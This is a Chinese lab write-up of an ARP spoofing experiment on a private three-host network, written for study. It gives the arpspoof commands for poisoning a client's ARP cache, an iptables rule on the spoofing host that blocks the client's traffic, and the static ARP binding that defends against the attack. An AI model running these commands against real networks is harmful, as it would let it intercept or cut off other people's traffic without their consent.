ARP欺骗实验

实验规划：
同一网段的主机三台
主机1 客户机 192.168.11.10
主机2 欺骗机 192.168.11.20
主机3 网关机 192.168.11.30 安装Apache

主机1：客户端
配置IP（192.168.11.10）
指定客户机网关:
~]#route add default gw 192.168.11.30
~]#traceroute 192.168.11.30 测试是否可以连通

在网关机上安装httpd，客户机使用命令测试连接
~]#curl 192.168.11.30  直接获取网页代码
或者
~]#elinks 192.168.11.30字符终端浏览器

欺骗机安装欺骗软件4个rpm包
进入软件所在目录，借助yum解决软件之间的依赖关系，安装arp欺骗所需要的软件包
~]#yum install *
dsniff-2.4-0.17.b1.el6.x86_64
libnet-1.1.6-7.el6.x86_64
libnids-1.24-1.el6.x86_64
ssldump-0.9-0.9.b3.el6.x86_64
开启欺骗机的网络转发功能
~]#vim /etc/sysctl.conf
将net.ipv4.ip_forward = 0修改为net.ipv4.ip_forward = 1
开启IPv4的数据包转发功能
~]#sysctl –p #更新内核的参数
在欺骗机上执行欺骗命令：
	arpspoof通过伪造arp回复包将局域网中主机A或者所有主机的网络包重定向到B主机
    ~]#arpspoof –i eth0 –t 192.168.11.10 192.168.11.30
监听网卡eth0上192.168.11.10 到 192.168.11.30的数据
-i 指定监听的网卡
-t 指定arp攻击的目标，不指定目标没该局域网中所有机器，可以指定多个目标

执行的命令：
~]#arpspoof -i eth0 -t 来源IP地址 目标IP地址 #前台交互式不可停止的命令，不能放入后台
-i 指定监听的网卡 
此命令为前台的交互式命令，不能够放入后台。
通过客户机连接192.168.11.30网关主机，此时客户机仍然可以访问网关机。

再打开一个欺骗机的远程终端，配置一条防火墙规则：
~]#iptables -A FORWARD -s 来源IP地址 -j REJECT
-A 追加的方式添加防火墙规则
-I 插入式的方式添加防火墙规则
FORWARD 经过的的数据
-s 来源地址
-j 如果前面符合要求执行的动作
REJECT 拒绝，告诉发送方该数据包被拒绝
DROP 丢弃，直接丢弃，不通知发送方
表示欺骗机接收到客户机的数据需要转发时，全部拒绝。
再次使用客户机去连接网关机，此时客户机不能连接。

arp欺骗的解决办法：
~]#arp –a 
我们会发现192.168.11.20和192.168.11.30拥有相同的MAC地址，这就是ARP欺骗的原理。
在客户机上执行以下命令，将网关的IP和MAC地址绑定，这样就可以正常通过网关进行数据通信。
~]#arp –s 192.168.11.30 网关机的MAC地址

linux下字符终端的浏览网页方式
elinks 字符终端浏览器
curl 直接获取网页代码

防火墙规则的删除
~]#iptables –D FORWARD(chain链) #（roulenum规则编号，即第几条）

~]#traceroute  IP|域名
-L 使用ICMP协议进行测试，linux默认使用UDP
-p 3 指定测试时发送的数据包个数（即测试的次数）
-n 以IP的方式进行连接测试，避开DNS的解析，减少延时

当返回值中出现*号时，一般情况是中间节点的防火墙封掉了ICMP的返回值
当返回值从中间到结束都是*号时，一般情况为目标服务器拒绝接受UDP数据包，或者禁止了ICMP的返回包。

实验总结：在安装软件的时候yum的依赖关系解决不了，但是重新启动后解决了依赖关系，后查明是因为还原快照时挂载出现问题，重新挂载解决。

「一键投喂软糖/蛋糕/布丁/牛奶/冰阔乐！」